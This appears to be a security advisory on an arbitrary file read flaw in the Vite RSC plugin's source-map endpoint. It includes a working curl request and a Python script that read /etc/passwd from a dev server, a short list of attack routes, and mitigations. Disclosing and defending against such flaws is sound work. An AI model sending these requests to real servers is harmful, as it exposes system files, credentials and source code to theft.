@vitejs/plugin-rsc, Arbitrary File Read Vulnerability (High)


The vulnerability exists in the `/__vite_rsc_findSourceMapURL` endpoint of the Vite RSC plugin (@vitejs/plugin-rsc). In development mode (`vite dev`), this endpoint accepts a user-controlled `filename` query parameter. If the value begins with `file://`, it is converted to a filesystem path with `fileURLToPath()`. The code then checks that the file exists with `fs.existsSync()` and, without confining the path to the project root or otherwise validating it, reads the entire file synchronously with `fs.readFileSync(filename, 'utf-8')`. The content is embedded in the `sourcesContent` array of a JSON response object, which is returned to the unauthenticated requester. Any file readable by the Node.js process can therefore be fetched by anyone who can reach the dev server.
Platform: @vitejs/plugin-rsc
Version: latest/unpatched
Vulnerability: Arbitrary file read
Severity: High
Date:

Prediction: Patch expected soon

What Undercode Say:

curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'

# Same request from Python; adjust host, port and file_path for the target dev server
import json
import urllib.parse
import urllib.request

host, port, file_path = 'localhost', 5173, '/etc/passwd'
url = f"http://{host}:{port}/__vite_rsc_findSourceMapURL"
params = urllib.parse.urlencode({'filename': f'file://{file_path}', 'environmentName': 'Server'})
response = urllib.request.urlopen(f"{url}?{params}")
data = json.loads(response.read())
print(data['sourcesContent'][0])  # first entry holds the requested file's contents

How to Exploit:

Network-exposed dev servers (for example `vite dev --host`, or a dev server reachable over a shared or tunneled network)

XSS chained attacks (script running in a developer's browser that requests the local dev server)

Malicious local packages

Protection from this vulnerability:

Restrict dev server exposure (bind to localhost only and never expose `vite dev` to untrusted networks)

Validate file paths (resolve the `file://` URL and reject anything outside the project root or other allowed directories)

Disable the plugin in development until a patched version is available

Impact:

Leaks environment files (e.g. `.env`) and other configuration

Exposes secrets/credentials stored on the developer machine or CI host

Exposes application source code


Sources:

Reported By: github.com
